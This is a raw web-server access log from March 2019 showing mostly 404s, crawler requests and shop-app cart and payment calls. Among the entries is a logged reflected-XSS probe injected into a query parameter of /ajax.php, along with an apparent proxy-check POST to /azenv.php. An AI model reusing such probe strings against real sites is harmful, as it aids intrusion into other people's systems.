[pid: 26361|app: 0|req: 146/146] 47.98.62.203 () {34 vars in 476 bytes} [Wed Mar 13 19:35:14 2019] GET / => generated 2010 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26361|app: 0|req: 147/147] 47.92.2.67 () {34 vars in 478 bytes} [Wed Mar 13 19:53:44 2019] GET / => generated 2014 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 148/148] 211.23.154.136 () {34 vars in 356 bytes} [Wed Mar 13 19:53:56 2019] GET / => generated 2013 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26361|app: 0|req: 149/149] 112.125.92.74 () {28 vars in 289 bytes} [Wed Mar 13 19:53:57 2019] HEAD / => generated 2014 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /source/plugin/qu_forumimglist/images/jquery-1.11.0.min.js
[pid: 26361|app: 0|req: 150/150] 203.208.60.100 () {44 vars in 1059 bytes} [Wed Mar 13 20:52:29 2019] GET /source/plugin/qu_forumimglist/images/jquery-1.11.0.min.js => generated 2199 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /data/cache/style_9_common.css
[pid: 26361|app: 0|req: 151/151] 203.208.60.63 () {44 vars in 1024 bytes} [Wed Mar 13 20:52:30 2019] GET /data/cache/style_9_common.css?A0T => generated 2119 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /source/plugin/qu_forumimglist/images/style.css
[pid: 26361|app: 0|req: 152/152] 203.208.60.9 () {44 vars in 1050 bytes} [Wed Mar 13 20:52:31 2019] GET /source/plugin/qu_forumimglist/images/style.css => generated 2166 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /data/cache/style_9_forum_forumdisplay.css
[pid: 26361|app: 0|req: 153/153] 203.208.60.123 () {44 vars in 1049 bytes} [Wed Mar 13 20:52:31 2019] GET /data/cache/style_9_forum_forumdisplay.css?A0T => generated 2155 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /source/plugin/qu_forumimglist/images/lightbox.css
[pid: 26361|app: 0|req: 154/154] 203.208.60.1 () {44 vars in 1056 bytes} [Wed Mar 13 20:52:32 2019] GET /source/plugin/qu_forumimglist/images/lightbox.css => generated 2175 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /template/qu_zuk/img/js/jquery.forum.js
[pid: 26361|app: 0|req: 155/155] 203.208.60.101 () {44 vars in 1021 bytes} [Wed Mar 13 20:52:32 2019] GET /template/qu_zuk/img/js/jquery.forum.js => generated 2142 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /home.php
[pid: 26361|app: 0|req: 156/156] 203.208.60.25 () {44 vars in 1033 bytes} [Wed Mar 13 20:52:32 2019] GET /home.php?mod=misc&ac=sendmail&rand=1547330755 => generated 2097 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /template/qu_zuk/img/js/jquery.js
[pid: 26361|app: 0|req: 157/157] 203.208.60.64 () {44 vars in 1008 bytes} [Wed Mar 13 20:52:33 2019] GET /template/qu_zuk/img/js/jquery.js => generated 2124 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /source/plugin/qu_forumimglist/images/lightbox.js
[pid: 26361|app: 0|req: 158/158] 203.208.60.88 () {44 vars in 1040 bytes} [Wed Mar 13 20:52:34 2019] GET /source/plugin/qu_forumimglist/images/lightbox.js => generated 2172 bytes in 5 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /template/qu_zuk/img/js/jquery.SuperSlide.js
[pid: 26361|app: 0|req: 159/159] 203.208.60.78 () {44 vars in 1030 bytes} [Wed Mar 13 20:52:34 2019] GET /template/qu_zuk/img/js/jquery.SuperSlide.js => generated 2157 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 160/160] 78.153.120.33 () {32 vars in 445 bytes} [Wed Mar 13 21:27:20 2019] GET / => generated 2016 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26361|app: 0|req: 161/161] 179.228.136.209 () {32 vars in 448 bytes} [Wed Mar 13 21:29:10 2019] GET / => generated 2016 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /cache/global/img/gs.gif
[pid: 26361|app: 0|req: 162/162] 80.82.70.187 () {32 vars in 414 bytes} [Wed Mar 13 22:13:32 2019] GET /cache/global/img/gs.gif => generated 2099 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26361|app: 0|req: 163/163] 102.135.132.37 () {38 vars in 512 bytes} [Wed Mar 13 23:09:17 2019] GET / => generated 2013 bytes in 71 msecs (HTTP/1.0 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 164/164] 187.10.153.164 () {32 vars in 447 bytes} [Wed Mar 13 23:33:24 2019] GET / => generated 2016 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /robots.txt
[pid: 26361|app: 0|req: 165/165] 203.208.60.77 () {36 vars in 507 bytes} [Wed Mar 13 23:59:13 2019] GET /robots.txt => generated 2061 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /forum.php
[pid: 26361|app: 0|req: 166/166] 203.208.60.66 () {38 vars in 676 bytes} [Wed Mar 13 23:59:14 2019] GET /forum.php?mod=forumdisplay&fid=47&filter=digest&digest=1 => generated 2117 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
[pid: 26361|app: 0|req: 167/167] 47.100.64.86 () {26 vars in 261 bytes} [Thu Mar 14 00:36:48 2019] GET / => generated 55164 bytes in 43 msecs (HTTP/1.0 400) 1 headers in 53 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 168/168] 79.107.175.17 () {32 vars in 445 bytes} [Thu Mar 14 00:43:33 2019] GET / => generated 2016 bytes in 5 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /ajax.php
[pid: 26361|app: 0|req: 169/169] 111.206.52.101 () {44 vars in 703 bytes} [Thu Mar 14 00:56:35 2019] GET /ajax.php?infloat=yes&handlekey=123);alert(/xss/);// => generated 2102 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 170/170] 116.62.215.53 () {34 vars in 502 bytes} [Thu Mar 14 01:19:10 2019] GET /axf/logout/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 5 headers in 146 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 171/171] 116.62.215.53 () {34 vars in 498 bytes} [Thu Mar 14 01:19:10 2019] GET /axf/mine/ => generated 5013 bytes in 7 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
Not Found: /azenv.php
[pid: 26361|app: 0|req: 172/172] 95.213.177.125 () {40 vars in 687 bytes} [Thu Mar 14 01:42:04 2019] POST /azenv.php?auth=155252772357&a=PSCN&i=795580870&p=80 => generated 2119 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 173/173] 47.100.57.133 () {34 vars in 461 bytes} [Thu Mar 14 01:46:44 2019] GET / => generated 2013 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /robots.txt
[pid: 26361|app: 0|req: 174/174] 123.126.113.105 () {36 vars in 478 bytes} [Thu Mar 14 02:00:22 2019] GET /robots.txt => generated 2062 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 175/175] 123.126.113.105 () {38 vars in 489 bytes} [Thu Mar 14 02:01:00 2019] GET / => generated 2014 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26361|app: 0|req: 176/176] 185.64.208.253 () {32 vars in 447 bytes} [Thu Mar 14 02:12:55 2019] GET / => generated 2016 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /forum.php
[pid: 26361|app: 0|req: 177/177] 203.208.60.107 () {38 vars in 677 bytes} [Thu Mar 14 02:18:46 2019] GET /forum.php?mod=forumdisplay&fid=47&filter=digest&digest=1 => generated 2117 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
[pid: 26361|app: 0|req: 178/178] 118.31.244.58 () {26 vars in 262 bytes} [Thu Mar 14 02:31:18 2019] GET / => generated 55165 bytes in 33 msecs (HTTP/1.0 400) 1 headers in 53 bytes (1 switches on core 1)
Not Found: /home.php
[pid: 26361|app: 0|req: 179/179] 203.208.60.5 () {44 vars in 1056 bytes} [Thu Mar 14 02:32:54 2019] GET /home.php?mod=misc&ac=sendmail&rand=1547330678 => generated 2097 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26361|app: 0|req: 180/180] 89.248.167.131 () {34 vars in 519 bytes} [Thu Mar 14 02:55:26 2019] GET / => generated 2013 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /robots.txt
[pid: 26361|app: 0|req: 181/181] 89.248.167.131 () {30 vars in 342 bytes} [Thu Mar 14 02:55:28 2019] GET /robots.txt => generated 2061 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /sitemap.xml
[pid: 26361|app: 0|req: 182/182] 89.248.167.131 () {30 vars in 344 bytes} [Thu Mar 14 02:55:28 2019] GET /sitemap.xml => generated 2064 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /.well-known/security.txt
[pid: 26361|app: 0|req: 183/183] 89.248.167.131 () {30 vars in 370 bytes} [Thu Mar 14 02:55:31 2019] GET /.well-known/security.txt => generated 2103 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /favicon.ico
[pid: 26361|app: 0|req: 184/184] 89.248.167.131 () {36 vars in 437 bytes} [Thu Mar 14 02:55:34 2019] GET /favicon.ico => generated 2064 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
[pid: 27603|app: 0|req: 11/11] 113.87.160.176 () {42 vars in 814 bytes} [Thu Mar 14 07:14:50 2019] GET /axf/returnurl/ => generated 905 bytes in 4 msecs (HTTP/1.1 200) 3 headers in 109 bytes (1 switches on core 0)
[pid: 27603|app: 0|req: 12/12] 113.87.160.176 () {42 vars in 820 bytes} [Thu Mar 14 07:15:03 2019] GET /axf/appnotifyurl/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 1)
Not Found: /home.php
[pid: 27603|app: 0|req: 13/13] 203.208.60.37 () {44 vars in 1019 bytes} [Thu Mar 14 07:16:06 2019] GET /home.php?mod=misc&ac=sendmail&rand=1547330777 => generated 2097 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
[pid: 27603|app: 0|req: 14/14] 113.88.14.120 () {44 vars in 875 bytes} [Thu Mar 14 07:16:45 2019] GET /axf/mine/ => generated 5079 bytes in 11 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 27603|app: 0|req: 15/15] 113.88.14.120 () {44 vars in 884 bytes} [Thu Mar 14 07:16:47 2019] GET /axf/market/ => generated 11267 bytes in 20 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 1)
[pid: 27603|app: 0|req: 16/16] 113.88.14.120 () {44 vars in 833 bytes} [Thu Mar 14 07:16:48 2019] GET /axf/addcart/?goodsid=984 => generated 73 bytes in 13 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 27603|app: 0|req: 17/17] 113.88.14.120 () {44 vars in 882 bytes} [Thu Mar 14 07:16:49 2019] GET /axf/cart/ => generated 4115 bytes in 15 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 27603|app: 0|req: 18/18] 113.88.14.120 () {44 vars in 898 bytes} [Thu Mar 14 07:16:51 2019] GET /axf/genenateorder/ => generated 1237 bytes in 30 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 27603|app: 0|req: 19/19] 113.88.14.120 () {44 vars in 830 bytes} [Thu Mar 14 07:16:52 2019] GET /axf/pay/?orderid=75 => generated 100 bytes in 10 msecs (HTTP/1.1 200) 3 headers in 101 bytes (1 switches on core 1)
[pid: 27603|app: 0|req: 20/20] 113.88.14.120 () {44 vars in 830 bytes} [Thu Mar 14 07:16:56 2019] GET /axf/pay/?orderid=75 => generated 100 bytes in 10 msecs (HTTP/1.1 200) 3 headers in 101 bytes (1 switches on core 0)
[pid: 27603|app: 0|req: 21/21] 113.88.14.120 () {44 vars in 830 bytes} [Thu Mar 14 07:16:57 2019] GET /axf/pay/?orderid=75 => generated 100 bytes in 10 msecs (HTTP/1.1 200) 3 headers in 101 bytes (1 switches on core 1)
[pid: 27603|app: 0|req: 22/22] 113.88.14.120 () {44 vars in 830 bytes} [Thu Mar 14 07:16:58 2019] GET /axf/pay/?orderid=75 => generated 100 bytes in 10 msecs (HTTP/1.1 200) 3 headers in 101 bytes (1 switches on core 0)
[pid: 27603|app: 0|req: 23/23] 113.88.14.120 () {44 vars in 830 bytes} [Thu Mar 14 07:17:01 2019] GET /axf/pay/?orderid=75 => generated 100 bytes in 14 msecs (HTTP/1.1 200) 3 headers in 101 bytes (1 switches on core 1)
[pid: 27603|app: 0|req: 24/24] 113.88.14.120 () {44 vars in 830 bytes} [Thu Mar 14 07:17:05 2019] GET /axf/pay/?orderid=75 => generated 100 bytes in 9 msecs (HTTP/1.1 200) 3 headers in 101 bytes (1 switches on core 0)
[pid: 27603|app: 0|req: 25/25] 113.88.14.120 () {44 vars in 830 bytes} [Thu Mar 14 07:17:05 2019] GET /axf/pay/?orderid=75 => generated 100 bytes in 10 msecs (HTTP/1.1 200) 3 headers in 101 bytes (1 switches on core 1)
[pid: 27603|app: 0|req: 26/26] 113.88.14.120 () {44 vars in 830 bytes} [Thu Mar 14 07:17:05 2019] GET /axf/pay/?orderid=75 => generated 100 bytes in 10 msecs (HTTP/1.1 200) 3 headers in 101 bytes (1 switches on core 0)
[pid: 27603|app: 0|req: 27/27] 113.88.14.120 () {44 vars in 830 bytes} [Thu Mar 14 07:17:05 2019] GET /axf/pay/?orderid=75 => generated 100 bytes in 10 msecs (HTTP/1.1 200) 3 headers in 101 bytes (1 switches on core 1)
[pid: 27603|app: 0|req: 28/28] 113.88.14.120 () {44 vars in 830 bytes} [Thu Mar 14 07:17:05 2019] GET /axf/pay/?orderid=75 => generated 100 bytes in 10 msecs (HTTP/1.1 200) 3 headers in 101 bytes (1 switches on core 0)
